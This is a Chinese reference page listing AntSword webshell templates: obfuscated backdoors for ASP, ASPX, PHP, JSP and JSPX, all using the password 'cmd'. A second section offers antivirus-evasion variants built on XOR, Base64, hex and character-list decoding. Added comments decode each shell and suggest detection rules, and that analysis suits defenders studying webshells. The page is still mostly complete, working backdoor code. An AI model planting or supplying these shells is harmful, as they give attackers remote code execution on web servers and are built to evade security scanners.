AntSword-蚁剑后门类型
⚠ 免责声明
本平台发布的所有内容仅供学习和参考之用。
如有任何非法或不当用途,责任由使用者自行承担,与平台及本文作者无关。
⚡ 请遵守相关法律法规,合理使用,享受学习的乐趣!⚡
一般shell生成
ASP
<!-- 使用时请删除此行, 连接密码: cmd -->
<%<!--"-->
' Analysis: the hex constant passed to CoN() decodes to evAl(ReQuesT("Cmd")), so this page
' evaluates whatever VBScript text arrives in the "Cmd" request value.
' Keyword case is scrambled throughout; VBScript is case-insensitive, so content rules
' for Execute/Eval in .asp files need to match case-insensitively.
execuTE(CoN("6576416C28526551756573542822436D64222929"))
' con(): hex-to-text decoder; walks sTrhex two characters at a time and appends Chr("&h" & pair).
funCTiON con(bYref sTrhex):diM lengTh:Dim Max:DIM str:MAX = lEN(StRhEx):FoR LeNGtH = 1 tO mAx STeP 2:stR = stR & Chr("&h" & mid(STrHex, leNgTH, 2)):NeXt:COn = STr:end FunCtIon')
%>
ASPX
<%-- // 使用时请删除此行, 连接密码: cmd --%>
<%@Page Language="Jscript"%>
<%-- Analysis: the argument of eval() is one Base64 string assembled from literal fragments,
     char() arithmetic and nested single-character Base64 decodes. Reassembled and decoded
     (code page 936) it reads
         871525;var safe="unsafe";eval(Request.Item['cmd'], safe);2614575;
     so the request value "cmd" is evaluated as JScript; the leading and trailing numbers are padding.
     Detection: eval() fed by FromBase64String in an .aspx page, and a Jscript page directive
     on a site that otherwise uses C# or VB. --%>
<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('ODcxN'+'TI1O3'+'ZhciB'+'zYWZl'+''+'P'+char(01501-01356)+char(0100016/0673)+char(24549/501)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Yg=='))+''+''+'n'+'N'+char(0234320/01402)+'Z'+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('bQ=='))+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydj'+'bWQnX'+'Swgc2'+'FmZSk'+'7MjYx'+'NDU3N'+'Ts='+'')));%>
ASPXCSHARP
<%-- // 使用时请删除此行, 连接密码: cmd --%>
<%@ Page Language="c#"%>
<%
// Analysis: takes the POST field "cmd", Base64-decodes it and hands the bytes to
// Assembly.Load, so a caller-supplied .NET assembly is loaded from memory into the
// application's process rather than from a file in the web root.
String pointer = Request.Form["cmd"];
if (pointer != null){
System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(pointer));
// Instantiates the type "<assembly name>.Run"; the Equals(null) call only uses the new object.
// NOTE(review): presumably the supplied type does its work in its constructor or an Equals override.
assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(null);
}
// Detection: Assembly.Load(byte[]) or CreateInstance applied to request data in page code,
// and large Base64 POST bodies sent repeatedly to a single .aspx.
%>
PHP
<?php // 使用时请删除此行, 连接密码: cmd ?>
<?php
/*
 * Analysis: create_function() receives an argument list and a body that are built from
 * chr() arithmetic, str_rot13() and base64_decode() fragments; they evaluate to
 * '$some' and 'eval($some);'. The resulting function is then called with a Base64
 * string that decodes to
 *     695582;@evAl($_POST[cmd]);2086746;
 * so the POST field "cmd" is evaluated as PHP; the surrounding numbers are padding.
 * create_function() was removed in PHP 8.0.
 * Detection: create_function or eval reached through string-building calls
 * (chr, str_rot13, base64_decode) rather than literal arguments.
 */
$xtDr=create_function(chr(0x157-0x133).str_rot13('f').chr(0222613/01245).chr(0x13444/0x2d4).chr(438-337),chr(0x295-0x230).chr(0x38e-0x318).base64_decode('YQ==').chr(0xa638/0x18a).chr(36960/924).str_rot13('$').chr(0x21d-0x1aa).base64_decode('bw==').str_rot13('z').str_rot13('r').base64_decode('KQ==').chr(01611-01516));$xtDr(base64_decode('Njk1N'.'TgyO0'.'BldkF'.'sKCRf'.''.chr(0x5cf8/0x118).str_rot13('R').str_rot13('9').chr(699-615).chr(01710-01562).''.''.chr(0x2e3-0x29d).base64_decode('dA==').chr(0105764/0522).str_rot13('o').chr(357-270).''.'RdKTs'.'yMDg2'.'NzQ2O'.'w=='.''));?>
JSP
<%-- 使用时请删除此行, 连接密码: cmd --%>
<%!
// Analysis: OBJECT subclasses ClassLoader only to expose defineClass() through the public
// quote() method, which turns a raw byte array into a Class.
class OBJECT extends ClassLoader{
OBJECT(ClassLoader c){super(c);}
public Class quote(byte[] b){
return super.defineClass(b, 0, b.length);
}
}
// lazy(): Base64-decodes str via reflection. It tries sun.misc.BASE64Decoder first and falls
// back to java.util.Base64; if both attempts throw, the inner exception is swallowed and
// null is returned.
// Detection: a ClassLoader subclass or defineClass call declared inside a JSP, and
// reflective lookups of Base64 decoder classes by name.
public byte[] lazy(String str) throws Exception {
Class base64;
byte[] value = null;
try {
base64=Class.forName("sun.misc.BASE64Decoder");
Object decoder = base64.newInstance();
value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
} catch (Exception e) {
try {
base64=Class.forName("java.util.Base64");
Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
} catch (Exception ee) {}
}
return value;
}
%>
<%
// Analysis: the request parameter "cmd" is Base64-decoded by lazy(), defined as a class by
// OBJECT.quote(), instantiated, and its equals() is called with {request, response}.
// NOTE(review): presumably the supplied class overrides equals() to receive those servlet objects.
// Detection: a "cmd" parameter carrying a long Base64 value, and classes defined at runtime
// by a loader declared in the page itself.
String cls = request.getParameter("cmd");
if (cls != null) {
new OBJECT(this.getClass().getClassLoader()).quote(lazy(cls)).newInstance().equals(new Object[]{request,response});
}
%>
JSPX
<!-- 使用时请删除此行, 连接密码: cmd -->
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
<jsp:declaration>
// Analysis: same structure as the JSP sample, in JSP XML syntax and with different identifiers.
// MINIMAL subclasses ClassLoader only to expose defineClass() through the public amortized() method.
class MINIMAL extends ClassLoader {
MINIMAL(ClassLoader c) { super(c);}
public Class amortized(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
// arithmetic(): Base64-decodes str via reflection, trying sun.misc.BASE64Decoder and then
// java.util.Base64; returns null when both attempts throw (the inner exception is swallowed).
public byte[] arithmetic(String str) throws Exception {
Class base64;
byte[] value = null;
try {
base64=Class.forName("sun.misc.BASE64Decoder");
Object decoder = base64.newInstance();
value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });
} catch (Exception e) {
try {
base64=Class.forName("java.util.Base64");
Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });
} catch (Exception ee) {}
}
return value;
}
</jsp:declaration>
<jsp:scriptlet>
// The request parameter "cmd" is decoded, defined as a class, instantiated, and its equals()
// is called with {request, response}.
// Detection: the identifiers differ from the JSP sample while the structure is the same, so
// rules should key on the ClassLoader subclass plus defineClass pattern, not on names.
String cls = request.getParameter("cmd");
if (cls != null) {
new MINIMAL(this.getClass().getClassLoader()).amortized(arithmetic(cls)).newInstance().equals(new Object[]{request,response});
}
</jsp:scriptlet>
</jsp:root>
JSPJS
<%-- 使用时请删除此行, 连接密码: cmd --%>
<%
// Analysis: obtains the javax.script engine registered as "js", binds the servlet request and
// response into it, and evaluates the request parameter "cmd" as script.
// Any exception is caught and written to the response with the prefix "Error:// ", which
// can serve as a response-side indicator.
// Detection: ScriptEngineManager / getEngineByName in a JSP combined with eval() on
// request.getParameter().
try {
javax.script.ScriptEngine method = new javax.script.ScriptEngineManager().getEngineByName("js");
method.put("request", request);
method.put("response", response);
method.eval(request.getParameter("cmd"));
} catch (Exception e) {
out.println("Error:// "+e.toString());;
}
%>
JSPXJS
<!-- 使用时请删除此行, 连接密码: cmd -->
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
<jsp:scriptlet>
// Analysis: JSP XML form of the script-engine sample. It obtains the javax.script engine
// registered as "js", binds the servlet request and response into it, and evaluates the
// request parameter "cmd" as script.
// The catch branch prints with the prefix "Error:// ".
// Detection: ScriptEngineManager / getEngineByName in a .jspx file combined with eval() on
// request.getParameter().
try {
javax.script.ScriptEngine event = new javax.script.ScriptEngineManager().getEngineByName("js");
event.put("request", request);
event.put("response", response);
event.eval(request.getParameter("cmd"));
} catch (Exception e) {
out.println("Error:// "+e.toString);;
}
</jsp:scriptlet>
</jsp:root>
免杀shell生成
ASP
PASSWD="cmd"
<%
' Analysis: MDBV() splits its argument on "/" and maps every number n to Chr(n - 88).
' The list passed to it below therefore decodes to: eval request("cmd")
' so the request value "cmd" is evaluated as VBScript.
' Detection: Execute/Eval whose argument comes from a numeric-list or Chr() decoder instead of
' a literal; VBScript is case-insensitive, so match keywords case-insensitively.
<!--
Function MDBV(HYUX):
HYUX = Split(HYUX,"/")
For x=0 To Ubound(HYUX)
MDBV=MDBV&Chr(HYUX(x)-88)
Next
End Function
EXecutE(MDBV("189/206/185/196/120/202/189/201/205/189/203/204/128/122/187/197/188/122/129"))
-->
%>
ASPX
PASSWD="cmd"
<%@ Page Language="Jscript" Debug=true%>
<%
// Analysis: ALBE is a lookup alphabet. Positions 32, 12, 16, 19, 6 and 10 hold U, N, s, A, f, e,
// so XKJN becomes the string "UNsAfe" without that word appearing literally in the file.
// The POST field "cmd" is then passed to eval() with that string as the second argument.
// Detection: eval() on Request.Form data in an .aspx page, and a Jscript page directive on a
// site that otherwise uses C# or VB. The variable names look random, so rules should not
// depend on them.
var ALBE='xBXdmkfpjbePNlhFsRKAVarMTgDwJSWCUOQyLuqtnGZcIiYEozHv';
var NZPY=Request.Form("cmd");
var XKJN=ALBE(32) + ALBE(12) + ALBE(16) + ALBE(19) + ALBE(6) + ALBE(10);
eval(NZPY, XKJN);
%>
PHP
PASSWD="cmd"
<?php
// Analysis: dCbX() XORs six pairs of single-byte strings to produce the letters a, s, s, e, r, t
// and returns "assert", so the function name never appears literally in the file.
class QDGO {
function dCbX() {
$RHMi = "\x56" ^ "\x37";
$ZUyX = "\x86" ^ "\xf5";
$vgMc = "\x8e" ^ "\xfd";
$Gtxb = "\xe9" ^ "\x8c";
$TTFz = "\xb8" ^ "\xca";
$wJPS = "\xd7" ^ "\xa3";
$LNYB =$RHMi.$ZUyX.$vgMc.$Gtxb.$TTFz.$wJPS;
return $LNYB;
}
// When the object is destroyed, the name returned by dCbX() is called as a function on
// $this->vk, with errors suppressed by @.
function __destruct(){
$vRjf=$this->dCbX();
@$vRjf($this->vk);
}
}
$qdgo = new QDGO();
// vk is taken from the POST field "cmd"; when the query parameter "id" is present the value
// is Base64-decoded first.
@$qdgo->vk = isset($_GET['id'])?base64_decode($_POST['cmd']):$_POST['cmd'];
// Detection: function names assembled by XOR or concatenation and then invoked through a
// variable, especially inside __destruct; request data assigned to an object property that a
// destructor consumes. String evaluation by assert() was removed in PHP 8.0.
?>